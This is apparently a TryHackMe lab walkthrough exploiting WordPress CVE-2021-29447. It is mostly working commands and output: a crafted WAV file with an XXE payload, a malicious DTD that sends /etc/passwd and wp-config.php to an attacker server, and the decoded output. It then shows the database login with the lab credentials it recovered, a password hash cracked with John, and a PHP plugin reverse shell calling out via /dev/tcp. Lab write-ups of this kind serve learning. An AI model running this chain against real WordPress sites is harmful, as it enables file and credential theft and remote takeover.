tryhackme
// 2024-12-30
// ID: REF-Wordpress CVE 2021 29447
Wordpress CVE 2021 29447
cve-2021-29447
> cve-2021-29447
cve-2021-29447
wordpress login
user: test-corp
password: test
after in my pc create poc.wav
cat poc.wav
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
remember to add
http://YOURSEVERIP:PORTto you ip and port and addNAMEEVIL.dtdname this you dtd file create that dtd file like this,
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
and also add & change your details,
now you have all file so upload poc.wav file to wordpress media section and before that open php server
php -S 0.0.0.0:1234
and after you upload that wav.poc file you get no of encode text like this
❯ php -S 0.0.0.0:1234
[Fri Oct 10 09:35:06 2025] PHP 8.4.11 Development Server (http://0.0.0.0:1234) started
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 Accepted
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 [200]: GET /test.dtd
[Fri Oct 10 09:35:33 2025] 10.201.83.44:41890 Closing
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 Accepted
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 [404]: GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X - No such file or directory
[Fri Oct 10 09:35:34 2025] 10.201.83.44:41892 Closing
[Fri Oct 10 09:35:36 2025] 10.201.83.44:41894 Accepted
[Fri Oct 10 09:35:36 2025] 10.201.83.44:41894 [200]: GET /test.dtd
[Fri Oct 10 09:35:36 2025] 10.201.83.44:41894 Closing
[Fri Oct 10 09:35:37 2025] 10.201.83.44:41896 Accepted
[Fri Oct 10 09:35:37 2025] 10.201.83.44:41896 [404]: GET /?p=hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X - No such file or directory
So you got you need info but all info not readable so to convert into readable decode like this,
nano decode.php
```
> <?php echo zlib_decode(base64_decode('base64her'));
> so to decode add and run
```
```
> <?php echo zlib_decode(base64_decode('hVTbjpswEH3fr+CxlYLMLTc/blX1ZVO1m6qvlQNeYi3Y1IZc+vWd8RBCF1aVDZrxnDk+9gxYY1p+4REMiyaj90FpdhDu+FAIWRsNiBhG77DOWeYAcreYNpUplX7A1QtPYPj4PMhdHYBSGGixQp5mQToHVMZXy2Wace+yGylD96EUtUSmJV9FnBzPMzL/oawFilvxOOFospOwLBf5UTLvTvBVA/A1DDA82DXGVKxqillyVQF8A8ObPoGsCVbLM+rewvDmiJz8SUbX5SgmjnB6Z5RD/iSnseZyxaQUJ3nvVOR8PoeFaAWWJcU5LPhtwJurtchfO1QF5YHZuz6B7LmDVMphw6UbnDu4HqXL4AkWg53QopSWCDxsmq0s9kS6xQl2QWDbaUbeJKHUosWrzmKcX9ALHrsyfJaNsS3uvb+6VtbBB1HUSn+87X5glDlTO3MwBV4r9SW9+0UAaXkB6VLPqXd+qyJsFfQntXccYUUT3oeCHxACSTo/WqPVH9EqoxeLBfdn7EH0BbyIysmBUsv2bOyrZ4RPNUoHxq8U6a+3BmVv+aDnWvUyx2qlM9VJetYEnmxgfaaInXDdUmbYDp0Lh54EhXG0HPgeOxd8w9h/DgsX6bMzeDacs6OpJevXR8hfomk9btkX6E1p7kiohIN7AW0eDz8H+MDubVVgYATvOlUUHrkGZMxJK62Olbbdhaob0evTz89hEiVxmGyzbO0PSdIReP/dOnck9s2g+6bEh2Z+O1f3u/IpWxC05rvr/vtTsJf2Vpx3zv0X'));
```
you get,
❯ php decode.php
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
stux:x:1000:1000:CVE-2021-29447,,,:/home/stux:/bin/bash
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:109:117:MySQL Server,,,:/nonexistent:/bin/false
to get sql database info change dtd like this
!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/`etc/passwd`">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.21.16.42:1234/?p=%file;'>" >
your original command looks like this in dtd therefore you get above info to get database info we have to change dtd file we know wordpress database store like this
var/www/html/wp-config.phpso we change that dtd file like this
!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/var/www/html/wp-config.php">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.21.16.42:1234/?p=%file;'>" >
now start php server and you get database info,
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpressdb2' );
/** MySQL database username */
define( 'DB_USER', 'thedarktangent' );
/** MySQL database password */
define( 'DB_PASSWORD', 'sUp3rS3cret132' );
Using those username & pwd login to database
❯ mysql -h 10.201.83.44 -u thedarktangent -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: Certificate verification failure: The certificate is NOT trusted.
But this error comes so login old way
❯ mysql -h 10.201.83.44 -u thedarktangent -p --ssl=0
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 55
Server version: 5.7.33-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
after login find hashes another user
corp-001
$P$B4fu6XVPkSU5KcKUsP1sD3Ul7G3oae1
so use John for crack hash
john hash.txt
Proceeding with wordlist:/usr/share/john/password.lst
teddybear (?)
Found pwd so login as a new user and in plugin section add php reverse shell and get shell
add this to plugins index.php section
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.21.16.42/4444 0>&1'");
after in reverse shell and to get stable shell
which python3
/usr/bin/python3
www-data@ubuntu:/var/www/html/wp-content/plugins/akismet$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/home$ ls
ls
stux
www-data@ubuntu:/home$ cd stux
cd stux
www-data@ubuntu:/home/stux$ ls -la
ls -la
total 44
drwxr-xr-x 5 stux stux 4096 May 26 2021 .
drwxr-xr-x 3 root root 4096 May 26 2021 ..
-rw------- 1 root root 3359 May 26 2021 .bash_history
-rw-r--r-- 1 stux stux 220 May 26 2021 .bash_logout
-rw-r--r-- 1 stux stux 3771 May 26 2021 .bashrc
drwx------ 2 stux stux 4096 May 26 2021 .cache
-rw------- 1 stux stux 131 May 26 2021 .mysql_history
drwxrwxr-x 2 stux stux 4096 May 26 2021 .nano
-rw-r--r-- 1 stux stux 655 May 26 2021 .profile
-rw-r--r-- 1 stux stux 0 May 26 2021 .sudo_as_admin_successful
-rw-r--r-- 1 root root 183 May 26 2021 .wget-hsts
drwxrwxr-x 2 stux stux 4096 May 26 2021 flag
www-data@ubuntu:/home/stux$ cd flag
cd flag
www-data@ubuntu:/home/stux/flag$ ls
ls
flag.txt
www-data@ubuntu:/home/stux/flag$ cat flag.txt
cat flag.txt
you can get that port like this
MySQL [information_schema]> SHOW VARIABLES LIKE 'port';
+---------------+-------+
| Variable_name | Value |
+---------------+-------+
| port | 3306 |
+---------------+-------+
1 row in set (0.366 sec)
MySQL [information_schema]>